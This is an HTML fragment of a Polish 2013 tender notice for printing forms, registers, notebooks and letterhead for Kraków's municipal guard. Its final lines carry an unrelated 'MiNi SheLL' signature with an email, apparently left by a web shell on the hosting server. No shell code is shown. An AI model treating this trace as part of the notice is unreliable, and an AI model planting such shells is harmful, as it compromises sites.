Druki będą wykonane  w formacie A6, na papierze białym, każda kartka zadrukowana  dwustronnie w kolorze czarnym. Druki wzdłuż krótszej krawędzi muszą być sklejone w bloczki po 50 kartek w sposób umożliwiający łatwe odrywanie kartek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> rejestry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rejestr nr 1 - książka wydawania - przyjęcia broni i amunicji - 14  szt. (wzór nr 13)
Rejestry  będą wykonane w formacie A4 w układzie poziomym, na papierze białym, 80g/m2,  każda kartka 
zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez stron tytułowej - 160, strony numerowane. Rejestry muszą być oprawione w okładkę 
kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 2 - rejestr rozliczania bloczków mandatowych - 100  szt. (wzór nr 14)
Rejestry będą wykonane w formacie A4 w układzie poziomym, na papierze białym, 80g/m2,  każda kartka 
zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 50, strony numerowane. Rejestry muszą być oprawione w okładkę kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.
Rejestr nr 3 - książka odpraw do służby - 40 szt. (wzór nr 15)
Rejestry  będą wykonane w formacie A4 w układzie poziomym, na papierze białym, 80g/m2,  każda kartka 
zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 200, strony numerowane. Rejestry muszą być oprawione w okładkę 
kartonową, min. 200g/m2,na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką 
muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką.

Rejestr nr 4 - zestawienie zdawanych odcinków D mandatów karnych - 60  szt. (wzór nr 16)
Rejestry  będą wykonane w formacie A4 w układzie pionowym, na papierze białym, 80g/m2,  każda kartka
 zadrukowana dwustronnie w kolorze czarnym. Treść strony tytułowej i wnętrza rejestru - zgodna ze wzorem.  Ilość stron, bez strony tytułowej - 100, strony numerowane. Rejestry muszą być oprawione w okładkę 
kartonową, min. 200g/m2, na okładce musi być umieszczona nazwa rejestru. Kartki rejestru wraz z okładką muszą być zszyte w sposób trwały. Grzbiet powinien być przykryty okładką..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> notatniki służbowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> notatniki służbowe - 3000 szt. (wzór nr 17)
Druki będą wykonane  w formacie A6, na papierze białym gramatury 80 g/m2, każda kartka zadrukowana  
dwustronnie w kolorze czarnym. Okładka twarda gramatury min. 200 g/m2 wg wzoru 1, strona tytułowa 
wg wzoru 2, strony ponumerowane, ilość kartek 62, zawartość strony wg wzoru 3. Wszystkie kartki złączone 
w sposób trwały (szycie, klejenie), grzbiet przykryty okładką..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> druki firmowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> p-1 Komendant Straży Miejskiej Miasta Krakowa - 5 000 szt.  (wzór nr 18)
p-2 SMMK - Oddział II Krowodrza - 1 500 szt. (wzór nr 19)
p-3 SMMK - Oddział III Nowa Huta - 1 500 szt. (wzór nr 20)
p-4 SMMK - Oddział IV Podgórze  - 1 500 szt. (wzór nr 21)
p-5 SMMK - Oddział V Wola Duchacka - 1 500 szt. (wzór nr 22)
p-6 SMMK - Oddział VI Wzgórza Krzesławickie - 1 500 szt. (wzór nr 23)
Każdy rodzaj druku wykonany musi być na papierze białym min. 160 CIE (+/-3), gramatura 90 g/m2, gatunek I.    W nagłówku: pasek kolorze ciemnogranatowym z białymi napisami,  emblemat w kolorze ciemnogranatowym obwiedziony żółtą obwódką, napisy w kolorze żółtym, herb Krakowa zgodnie z kolorystyką. W stopce: wszystkie napisy w kolorze ciemnogranatowym, logo certyfikatu jakości zgodnie z kolorystyką. Przy dostawie każdy rodzaj druku musi być spakowany oddzielnie, w partiach po 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com